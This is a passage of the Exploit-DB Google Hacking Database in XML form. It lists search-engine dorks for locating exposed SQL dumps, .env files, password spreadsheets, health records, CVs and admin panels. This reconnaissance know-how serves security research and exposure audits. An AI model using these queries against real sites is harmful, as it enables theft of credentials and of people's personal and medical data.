This google dork created by SIVABALAN ( DEKINGOFCYBER )</textualDescription>
<query>intext:Table structure for table `wp_users` filetype:sql</query>
<querystring>https://www.google.com/search?q=intext:Table structure for table `wp_users` filetype:sql</querystring>
<edb></edb>
<date>2017-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4536</id>
<link>https://www.exploit-db.com/ghdb/4536</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:uploadOverwrite || intext:OPEN || intext:cwd</shortDescription>
<textualDescription>-------------------------------------------------------------
Google Dork: intext:uploadOverwrite || intext:OPEN || intext:cwd
Author: Tarkan Catal X
This dork allows you to search for elFinder (https://studio-42.github.io/elFinder) log file.
This file contains ( hidden ) paths, directories, files and other juicy information.
--------------------------------------------------------------</textualDescription>
<query>intext:uploadOverwrite || intext:OPEN || intext:cwd</query>
<querystring>https://www.google.com/search?q=intext:uploadOverwrite || intext:OPEN || intext:cwd</querystring>
<edb></edb>
<date>2017-06-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>5236</id>
<link>https://www.exploit-db.com/ghdb/5236</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:user.sql intitle:index.of</shortDescription>
<textualDescription>Also intext:users.sql intitle:index.of
</textualDescription>
<query>intext:user.sql intitle:index.of</query>
<querystring>https://www.google.com/search?q=intext:user.sql intitle:index.of</querystring>
<edb></edb>
<date>2019-05-31</date>
<author>Dec0y</author>
</entry>
<entry>
<id>1252</id>
<link>https://www.exploit-db.com/ghdb/1252</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:ViewCVS inurl:Settings.php</shortDescription>
<textualDescription>CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc.</textualDescription>
<query>intext:ViewCVS inurl:Settings.php</query>
<querystring>https://www.google.com/search?q=intext%3AViewCVS+inurl%3ASettings.php+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4881</id>
<link>https://www.exploit-db.com/ghdb/4881</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:vmware virtual site:.gov filetype:xls | xlsx | doc | pdf</shortDescription>
<textualDescription>Lots of info on target's virtualization environment.
Change the site parameter to whatever you want or just get rid of it.
Also try:
intext:vmclusters site:.gov filetype:xls | xlsx | doc | pdf
intext:virtual hosts site:.gov filetype:xls | xlsx | doc | pdf
intext:virtual environment site:.gov filetype:xls | xlsx | doc | pdf
intext:vlan vhosts site:.gov filetype:xls | xlsx | doc | pdf
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:vmware virtual site:.gov filetype:xls | xlsx | doc | pdf</query>
<querystring>https://www.google.com/search?q=intext:vmware virtual site:.gov filetype:xls | xlsx | doc | pdf</querystring>
<edb></edb>
<date>2018-07-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5180</id>
<link>https://www.exploit-db.com/ghdb/5180</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intext:[To Parent Directory] &amp; ext:sql | ext:cnf | ext:config | ext:log</shortDescription>
<textualDescription># Google Dork: intext:[To Parent Directory] &amp; ext:sql | ext:cnf | ext:config | ext:log
# Description: Google Dork useful to find Directory Listening containing sql,cnf,config and log files
# Date: 2019-09-12
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/</textualDescription>
<query>intext:[To Parent Directory] &amp; ext:sql | ext:cnf | ext:config | ext:log</query>
<querystring>https://www.google.com/search?q=intext:[To Parent Directory] &amp; ext:sql | ext:cnf | ext:config | ext:log</querystring>
<edb></edb>
<date>2019-04-12</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>7799</id>
<link>https://www.exploit-db.com/ghdb/7799</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle&quot;index of&quot; &quot;php&quot;</shortDescription>
<textualDescription># Google Dork: intitle&quot;index of&quot; &quot;php&quot;
# Files Containing Juicy Info
# Date:14/11/2021
# Exploit Author: Sabyasachi Paul</textualDescription>
<query>intitle&quot;index of&quot; &quot;php&quot;</query>
<querystring>https://www.google.com/search?q=intitle&quot;index of&quot; &quot;php&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Sabyasachi Paul</author>
</entry>
<entry>
<id>7664</id>
<link>https://www.exploit-db.com/ghdb/7664</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle&quot;index of&quot; &quot;username&quot; &quot;password&quot; filetype: xlsx</shortDescription>
<textualDescription># Google Dork: intitle&quot;index of&quot; &quot;username&quot; &quot;password&quot; filetype: xlsx
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intitle&quot;index of&quot; &quot;username&quot; &quot;password&quot; filetype: xlsx</query>
<querystring>https://www.google.com/search?q=intitle&quot;index of&quot; &quot;username&quot; &quot;password&quot; filetype: xlsx</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7330</id>
<link>https://www.exploit-db.com/ghdb/7330</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle.index of .env</shortDescription>
<textualDescription># Google Dork: intitle.index of .env
# Files Containing Juicy Info
# Date:24/09/2021
# Exploit Author: Sugavanam D</textualDescription>
<query>intitle.index of .env</query>
<querystring>https://www.google.com/search?q=intitle.index of .env</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Sugavanam D</author>
</entry>
<entry>
<id>7762</id>
<link>https://www.exploit-db.com/ghdb/7762</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle.index of .exe</shortDescription>
<textualDescription># Google Dork: intitle.index of .exe
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle.index of .exe</query>
<querystring>https://www.google.com/search?q=intitle.index of .exe</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7759</id>
<link>https://www.exploit-db.com/ghdb/7759</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle.index of .log</shortDescription>
<textualDescription># Google Dork: intitle.index of .log
# Files Containing Juicy Info
# Date: 10/11/2021
# Exploit Author: Arzan Batliwala
</textualDescription>
<query>intitle.index of .log</query>
<querystring>https://www.google.com/search?q=intitle.index of .log</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Arzan Batliwala</author>
</entry>
<entry>
<id>7763</id>
<link>https://www.exploit-db.com/ghdb/7763</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle.index of API*.txt</shortDescription>
<textualDescription># Google Dork: intitle.index of API*.txt
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle.index of API*.txt</query>
<querystring>https://www.google.com/search?q=intitle.index of API*.txt</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7406</id>
<link>https://www.exploit-db.com/ghdb/7406</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;access log&quot; filetype: txt</shortDescription>
<textualDescription># Google Dork: intitle: &quot;access log&quot; filetype: txt
# Files Containing Juicy Info
# Date: 8/10/2021
# Exploit Author: Zeshan Ahmad</textualDescription>
<query>intitle: &quot;access log&quot; filetype: txt</query>
<querystring>https://www.google.com/search?q=intitle: &quot;access log&quot; filetype: txt</querystring>
<edb></edb>
<date>2021-10-08</date>
<author>Zeshan Ahmad</author>
</entry>
<entry>
<id>7275</id>
<link>https://www.exploit-db.com/ghdb/7275</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of /files clients&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of /files clients&quot;
# Files Containing Juicy Info
# Date:14/09/2021
# Exploit Author: Romell Marin Cordoba
</textualDescription>
<query>intitle: &quot;index of /files clients&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of /files clients&quot;</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>7361</id>
<link>https://www.exploit-db.com/ghdb/7361</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of data clinic&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of data clinic&quot;
# Files Containing Juicy Info
# Date:01/10/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>intitle: &quot;index of data clinic&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of data clinic&quot;</querystring>
<edb></edb>
<date>2021-10-01</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>7372</id>
<link>https://www.exploit-db.com/ghdb/7372</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of Health Records&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of Health Records&quot;
# Files Containing Juicy Info
# Date:01/10/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>intitle: &quot;index of Health Records&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of Health Records&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>7360</id>
<link>https://www.exploit-db.com/ghdb/7360</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;Index of ipcam&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;Index of ipcam&quot;
# Files Containing Juicy Info
# Date:1/10/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>intitle: &quot;Index of ipcam&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Index of ipcam&quot;</querystring>
<edb></edb>
<date>2021-10-01</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>7416</id>
<link>https://www.exploit-db.com/ghdb/7416</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of&quot; &quot;admin&quot; &quot;/backup&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of&quot; &quot;admin&quot; &quot;/backup&quot;
# Files Containing Juicy Info
# Date:09/10/2021
# Exploit Author: Roshdy Essam</textualDescription>
<query>intitle: &quot;index of&quot; &quot;admin&quot; &quot;/backup&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of&quot; &quot;admin&quot; &quot;/backup&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Roshdy Essam</author>
</entry>
<entry>
<id>8291</id>
<link>https://www.exploit-db.com/ghdb/8291</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of&quot; administrator</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of&quot; administrator
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Rahul Thakur</textualDescription>
<query>Reporting a New Google Dork : intitle: &quot;index of&quot; administrator</query>
<querystring>https://www.google.com/search?q=Reporting a New Google Dork : intitle: &quot;index of&quot; administrator</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Rahul Thakur</author>
</entry>
<entry>
<id>8025</id>
<link>https://www.exploit-db.com/ghdb/8025</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index of&quot; intext: human resources</shortDescription>
<textualDescription># Google dork : intitle: &quot;index of&quot; intext: human resources
# Category: Files containing Juicy info
# Date: 17/08/2022
# Exploit Author: Mark Ivan David
</textualDescription>
<query>intitle: &quot;index of&quot; intext: human resources</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of&quot; intext: human resources</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>7345</id>
<link>https://www.exploit-db.com/ghdb/7345</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;index&quot; inurl: log</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index&quot; inurl: log
# Files Containing Juicy Info
# Date:26/09/2021
# Exploit Author: adreeta maity</textualDescription>
<query>intitle: &quot;index&quot; inurl: log</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index&quot; inurl: log</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>adreeta maity</author>
</entry>
<entry>
<id>7417</id>
<link>https://www.exploit-db.com/ghdb/7417</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: &quot;Library System by YahooBaba&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;Library System by YahooBaba&quot;
# Files Containing Juicy Info
# Date:10/10/2021
# Exploit Author: Red Blue Ops</textualDescription>
<query>intitle: &quot;Library System by YahooBaba&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Library System by YahooBaba&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>5746</id>
<link>https://www.exploit-db.com/ghdb/5746</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: index of &quot;*db.tar.gz&quot;</shortDescription>
<textualDescription>This dork found some juicy information about the db files.You can change
the extension another compress application extension.
Google Dork : intitle: index of &quot;*db.tar.gz&quot;
Berat Isler ( root1x )
</textualDescription>
<query>intitle: index of &quot;*db.tar.gz&quot;</query>
<querystring>https://www.google.com/search?q=intitle: index of &quot;*db.tar.gz&quot;</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>7961</id>
<link>https://www.exploit-db.com/ghdb/7961</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: index of &quot;awstats&quot;</shortDescription>
<textualDescription># Google Dork: intitle: index of &quot;awstats&quot;
# Files Containing Juicy Info
# Date:04/07/2022
# Exploit Author: luis De la Rosa</textualDescription>
<query>intitle: index of &quot;awstats&quot;</query>
<querystring>https://www.google.com/search?q=intitle: index of &quot;awstats&quot;</querystring>
<edb></edb>
<date>2022-07-04</date>
<author>luis De la Rosa</author>
</entry>
<entry>
<id>7268</id>
<link>https://www.exploit-db.com/ghdb/7268</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: index of /bin/php.ini</shortDescription>
<textualDescription># Google Dork: intitle: index of /bin/php.ini
# Files Containing Juicy Info
# Date:05/09/2021
# Exploit Author: Arpan Chakraborty</textualDescription>
<query>intitle: index of /bin/php.ini</query>
<querystring>https://www.google.com/search?q=intitle: index of /bin/php.ini</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Arpan Chakraborty</author>
</entry>
<entry>
<id>8160</id>
<link>https://www.exploit-db.com/ghdb/8160</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: index of /phpMyAdmin/index.php</shortDescription>
<textualDescription># Google Dork: intitle: index of /phpMyAdmin/index.php
# Files Containing Juicy Info
# Date:17/04/2023
# Exploit Author: Rajendra Prasad Dhital</textualDescription>
<query>About dorks</query>
<querystring>https://www.google.com/search?q=About dorks</querystring>
<edb></edb>
<date>2023-04-17</date>
<author>Rajendra Prasad Dhital</author>
</entry>
<entry>
<id>8061</id>
<link>https://www.exploit-db.com/ghdb/8061</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle: index of /secrets/</shortDescription>
<textualDescription># Google Dork: intitle: index of /secrets/
# Files Containing Juicy Info
# Date:13/02/2023
# Exploit Author: Bappe Sarker</textualDescription>
<query>intitle: index of /secrets/</query>
<querystring>https://www.google.com/search?q=intitle: index of /secrets/</querystring>
<edb></edb>
<date>2023-02-13</date>
<author>Bappe Sarker</author>
</entry>
<entry>
<id>7353</id>
<link>https://www.exploit-db.com/ghdb/7353</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot; index of &quot; &quot;/BigIp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot; index of &quot; &quot;/BigIp&quot;
# Files Containing Juicy Info
# Date:26/09/2021
# Exploit Author: AFFAN AHMED</textualDescription>
<query>intitle:&quot; index of &quot; &quot;/BigIp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot; index of &quot; &quot;/BigIp&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>7881</id>
<link>https://www.exploit-db.com/ghdb/7881</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot; index of &quot;/order/status&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot; index of &quot;/order/status&quot;
# Files Containing Juicy Info
# Date: 08/12/2021
# Exploit Author: S Rahul</textualDescription>
<query>intitle:&quot; index of &quot;/order/status&quot;</query>
<querystring>https://www.google.com/search?q=Re: intitle:&quot; index of &quot;/order/status&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>S Rahul</author>
</entry>
<entry>
<id>7988</id>
<link>https://www.exploit-db.com/ghdb/7988</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot; TROJANS&quot; Analysis Report</shortDescription>
<textualDescription># Google Dork: intitle:&quot; TROJANS&quot; Analysis Report
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot; TROJANS&quot; Analysis Report</query>
<querystring>https://www.google.com/search?q=intitle:&quot; TROJANS&quot; Analysis Report</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>1061</id>
<link>https://www.exploit-db.com/ghdb/1061</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;admin panel&quot; +&quot;Powered by RedKernel&quot;</shortDescription>
<textualDescription>This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info</textualDescription>
<query>intitle:&quot;admin panel&quot; +&quot;Powered by RedKernel&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22admin+panel%22+%2B%22Powered+by+RedKernel%22+-site%3Aihackstuff.com</querystring>
<edb></edb>
<date>2005-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7841</id>
<link>https://www.exploit-db.com/ghdb/7841</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Apache Flink Web Dashboard&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Apache Flink Web Dashboard&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Alfie</textualDescription>
<query>intitle:&quot;Apache Flink Web Dashboard&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Apache Flink Web Dashboard&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Alfie</author>
</entry>
<entry>
<id>696</id>
<link>https://www.exploit-db.com/ghdb/696</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Apache::Status&quot; (inurl:server-status | inurl:status.html | inurl:apache.html)</shortDescription>
<textualDescription>The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm</textualDescription>
<query>intitle:&quot;Apache::Status&quot; (inurl:server-status | inurl:status.html | inurl:apache.html)</query>
<querystring>https://www.google.com/search?q=intitle:%22Apache::Status%22+(inurl:server-status+%7C+inurl:status.html+%7C+inurl:apache.html)&amp;num=100</querystring>
<edb></edb>
<date>2004-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>1422</id>
<link>https://www.exploit-db.com/ghdb/1422</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;AppServ Open Project *&quot; &quot;AppServ is a merging open source software installer package&quot; -phpbb</shortDescription>
<textualDescription>Often includes phpinfo and unsecured links to phpmyadmin.</textualDescription>
<query>intitle:&quot;AppServ Open Project *&quot; &quot;AppServ is a merging open source software installer package&quot; -phpbb</query>
<querystring>https://www.google.com/search?q=intitle:%22AppServ+Open+Project+*%22+%22AppServ+is+a+merging+open+source+software+installer+package%22+-phpbb&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>632</id>
<link>https://www.exploit-db.com/ghdb/632</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;AppServ Open Project&quot; -site:www.appservnetwork.com</shortDescription>
<textualDescription>AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages.</textualDescription>
<query>intitle:&quot;AppServ Open Project&quot; -site:www.appservnetwork.com</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22AppServ+Open+Project%22+-site%3Awww.appservnetwork.com</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>572</id>
<link>https://www.exploit-db.com/ghdb/572</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;ASP Stats Generator *.*&quot; &quot;ASP Stats Generator&quot; &quot;2003-2004 weppos&quot;</shortDescription>
<textualDescription>ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site.</textualDescription>
<query>intitle:&quot;ASP Stats Generator *.*&quot; &quot;ASP Stats Generator&quot; &quot;2003-2004 weppos&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ASP+Stats+Generator+*.*%22+%22ASP+Stats+Generator%22+%222003-2004+weppos%22&amp;btnG=B%FAsqueda</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>248</id>
<link>https://www.exploit-db.com/ghdb/248</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Big Sister&quot; +&quot;OK Attention Trouble&quot;</shortDescription>
<textualDescription>This search reveals Internal network status information about services and hosts.</textualDescription>
<query>intitle:&quot;Big Sister&quot; +&quot;OK Attention Trouble&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Big+Sister%22+%2B%22OK+Attention+Trouble%22</querystring>
<edb></edb>
<date>2004-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7989</id>
<link>https://www.exploit-db.com/ghdb/7989</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;bugs&quot; Analysis Report</shortDescription>
<textualDescription># Google Dork: intitle:&quot;bugs&quot; Analysis Report
# Files Containing Juicy Info
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;bugs&quot; Analysis Report</query>
<querystring>https://www.google.com/search?q=intitle:&quot;bugs&quot; Analysis Report</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>1074</id>
<link>https://www.exploit-db.com/ghdb/1074</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;curriculum vitae&quot; filetype:doc</shortDescription>
<textualDescription>Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:&quot;pl&quot; intitle:&quot;curriculum vitae&quot; filetype:docinurl:&quot;uk&quot; intitle:&quot;curriculum vitae&quot; filetype:docinurl:&quot;nl&quot; intitle:&quot;curriculum vitae&quot; filetype:doc, etc. in order to get national results,alsointitle:&quot;curriculum vitae&quot; ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.&quot;Click here for the Google search ==&gt; &quot;phone * * *&quot; &quot;address *&quot; &quot;e-mail&quot; intitle:&quot;curriculum vitae&quot;(opens in new window)Added: Thursday, August 19, 2004hits: 24771&quot;</textualDescription>
<query>intitle:&quot;curriculum vitae&quot; filetype:doc</query>
<querystring>https://www.google.com/search?q=intitle%3A%22curriculum+vitae%22+filetype%3Adoc&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7660</id>
<link>https://www.exploit-db.com/ghdb/7660</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;database&quot; &quot;backup&quot; filetype:sql</shortDescription>
<textualDescription># Google Dork: intitle:&quot;database&quot; &quot;backup&quot; filetype:sql
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>intitle:&quot;database&quot; &quot;backup&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=intitle:&quot;database&quot; &quot;backup&quot; filetype:sql</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>8242</id>
<link>https://www.exploit-db.com/ghdb/8242</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Documentation Index&quot; intext:&quot;Apache Tomcat Servlet&quot; inurl:&quot;docs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Documentation Index&quot; intext:&quot;Apache Tomcat Servlet&quot; inurl:&quot;docs&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Nullfuzz</textualDescription>
<query>intitle:&quot;Documentation Index&quot; intext:&quot;Apache Tomcat Servlet&quot; inurl:&quot;docs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Documentation Index&quot; intext:&quot;Apache Tomcat Servlet&quot; inurl:&quot;docs&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Nullfuzz</author>
</entry>
<entry>
<id>718</id>
<link>https://www.exploit-db.com/ghdb/718</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;DocuShare&quot; inurl:&quot;docushare/dsweb/&quot; -faq -gov -edu</shortDescription>
<textualDescription>some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know.</textualDescription>
<query>intitle:&quot;DocuShare&quot; inurl:&quot;docushare/dsweb/&quot; -faq</query>
<querystring>https://www.google.com/search?q=intitle%3A%22DocuShare%22+inurl%3A%22docushare%2Fdsweb%2F%22+-faq+-gov+-edu</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>838</id>
<link>https://www.exploit-db.com/ghdb/838</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;edna:streaming mp3 server&quot; -forums</shortDescription>
<textualDescription>Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:&quot;edna:*&quot; intitle:&quot;edna: Site Statistics&quot;</textualDescription>
<query>intitle:&quot;edna:streaming mp3 server&quot; -forums</query>
<querystring>https://www.google.com/search?q=intitle%3A%22edna%3Astreaming+mp3+server%22+-forums</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6573</id>
<link>https://www.exploit-db.com/ghdb/6573</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Environment Variables&quot; inurl:/cgi-bin/</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Environment Variables&quot; inurl:/cgi-bin/
Description: This Google Dork is used for listing &quot;Environment Variables&quot;
script which is a CGI script that lists sensitive information such as the
path names, server names, port numbers, server software, version numbers,
administrator email addresses etc all these juicy information can be
obtained.
Author: Sibi Mathew George
</textualDescription>
<query>intitle:&quot;Environment Variables&quot; inurl:/cgi-bin/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Environment Variables&quot; inurl:/cgi-bin/</querystring>
<edb></edb>
<date>2020-09-25</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>8267</id>
<link>https://www.exploit-db.com/ghdb/8267</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Error log for /LM/&quot;.edu</shortDescription>
<textualDescription># Google Dork : intitle:&quot;Error log for /LM/&quot;.edu
# Category : Files Containing Juicy Info
# Date : 19/10/2023
# Author : Neyamul Haque
</textualDescription>
<query>intitle:&quot;Error log for /LM/&quot;.edu</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Error log for /LM/&quot;.edu</querystring>
<edb></edb>
<date>2023-10-19</date>
<author>Neyamul Haque</author>
</entry>
<entry>
<id>4394</id>
<link>https://www.exploit-db.com/ghdb/4394</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;FormAssembly Enterprise :&quot;</shortDescription>
<textualDescription>FormAssembly installation finder. Contains forms organizations use to
collect information. Some sensitive. Some random. Enjoy.
Dork Keyword: intitle:&quot;FormAssembly Enterprise :&quot;
Vendor Homepage: https://www.formassembly.com/enterprise/
Category: Files Containing Juicy Info
------------ Discovered By: Matt - @novpn --------------</textualDescription>
<query>intitle:&quot;FormAssembly Enterprise :&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;FormAssembly Enterprise :&quot;</querystring>
<edb></edb>
<date>2017-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>819</id>
<link>https://www.exploit-db.com/ghdb/819</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;FTP root at&quot;</shortDescription>
<textualDescription>This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password.</textualDescription>
<query>intitle:&quot;FTP root at&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=intitle%3A%22FTP+root+at%22</querystring>
<edb></edb>
<date>2005-01-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>8033</id>
<link>https://www.exploit-db.com/ghdb/8033</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;IIS Windows Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;IIS Windows Server&quot;
# Files Containing Juicy Info
